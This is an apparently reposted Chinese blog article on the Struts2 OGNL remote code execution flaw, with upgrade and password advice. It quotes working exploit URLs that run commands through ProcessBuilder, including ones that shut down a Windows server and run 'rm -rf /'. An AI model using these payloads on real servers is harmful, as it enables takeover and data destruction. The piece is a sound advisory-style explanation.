Struts2高危漏洞 struts2 devmode 漏洞

Struts2高危漏洞 struts2 devmode 漏洞
Struts2前两天被爆高危漏洞,详细信息如下:简单来说,就是任意用户可以在Url中嵌入特定的语句来在使用了Struts2的Java服务器上执行任意代码。这是官方给出的利用方法(猪……):
  1. Simple Expression - the parameter names are evaluated as OGNL.
    1. http://host/struts2-blank/example/X.action?action:%{3*4}
    2. http://host/struts2-showcase/employee/save.action?redirect:%{3*4}
  1. Command Execution
    1. http://host/struts2-blank/example/X.action?action:%{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
    2. http://host/struts2-showcase/employee/save.action?redirect:%{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
    3. http://host/struts2-showcase/employee/save.action?redirectAction:%{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

通过后面添加action、redirect、redirectAction等url,可以在服务器上web服务器所在权限执行任意的代码。
也许这么说还不是很明白,再举个例子如果网站运行在Windows服务器上,直接执行http://localhost:8080/context/aa.action?redirect:%{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-s','-t','1'})).start()}就可以让服务器直接关机;如果网站运行在Linux服务器上,执行http://host//save.action?action:%{(new+java.lang.ProcessBuilder(new+ java.lang.String[]{'rm','-rf','/'})).start()}呵呵~~
也许没有权限执行rm -rf/,但是关个机重个启清空个数据库肯定是没问题吧。既然如此方便,这个漏洞现在估计早就被各种黑客玩出花了。
这年头高危漏洞多的是,为什么这次会引发这么大的影响呢?1.漏洞使用简单,并且可以执行任意代码2.Struts2框架在互联网上的使用非常普遍(淘宝、京东、各种公司政府网站)3.Struts官方主动爆出利用方法而不是只声明漏洞信息(典型猪队长)4.傻瓜化工具出现:一帮小学生黑客正在袭来。

而对于普通用户的影响:1.网站上的数据被窃,包括用户名密码和所有个人信息,甚至包括所有活动历史记录(比如网购记录之类)2.所有数据丢失(比如充值的rmb没了之类)3.如果在不同网站使用相同密码,很有可能其他网站的信息也会被盗

网站现在需要做的:赶快检查服务器配置和版本。如果是受到影响的版本(估计肯定是了),赶快更新到2.3.15.1http://struts.apache.org/download.cgi#struts23151检查服务器Log,查看最近是否有异常情况记录。
用户需要做的:重要的网站密码赶快修改,最近一段时间不要听信各种中奖汇款等信息。。。然后听天由命吧

  

爱华网本文地址 » http://www.413yy.cn/a/25101014/237552.html

更多阅读

怎样修复系统的漏洞 怎样修复系统漏洞

应用软件或操作系统软件在逻辑设计上的存在缺陷或错误,被黑客利用,通过网络给电脑植入木马、病毒等方式来攻击或控制我们的电脑,窃取我们电脑中的重要资料和信息,甚至破坏我们的操作系统。所以说,系统漏洞的存在,对我们的资料信息来说是

OpenSSL 漏洞的原理简介 openssl ocsp 漏洞

????2014年4月8日晚,互联网爆出了又一重量级安全漏洞,即CVE-2014-0160,通俗来讲就是OpenSSL出现了安全漏洞。????说这个漏洞前,先介绍一下OpenSSL,OpenSSL是一个强大的安全套接字层密码库,很多支付网站等涉及资金交易的平台都用它来做加

如何批量下载漏洞补丁 360漏洞补丁下载

如何批量下载漏洞补丁——简介有时候我们要给一些内网服务器打上漏洞补丁,但由于不能直接连接互联网,就没办法直接下载漏洞补丁,这里有一个办法,就是给内网服务器安装上最新的360安全卫士,使用安全卫士的漏洞扫描扫描出所少的补丁,然后导

电脑漏洞是否应该修复 360系统修复高危漏洞卡

电脑漏洞是否应该修复——简介我们的电脑一般会安装一些安全卫士,像360,金山,百度等,这些所谓的安全卫士经常会提示我们进行漏洞的修复,有时候是十几个,有时候甚至更多,那么我们是否真的应该修复这些漏洞呢?今天的经验就来分享漏洞修复那些

声明:《Struts2高危漏洞 struts2 devmode 漏洞》为网友弄不死你分享!如侵犯到您的合法权益请联系我们删除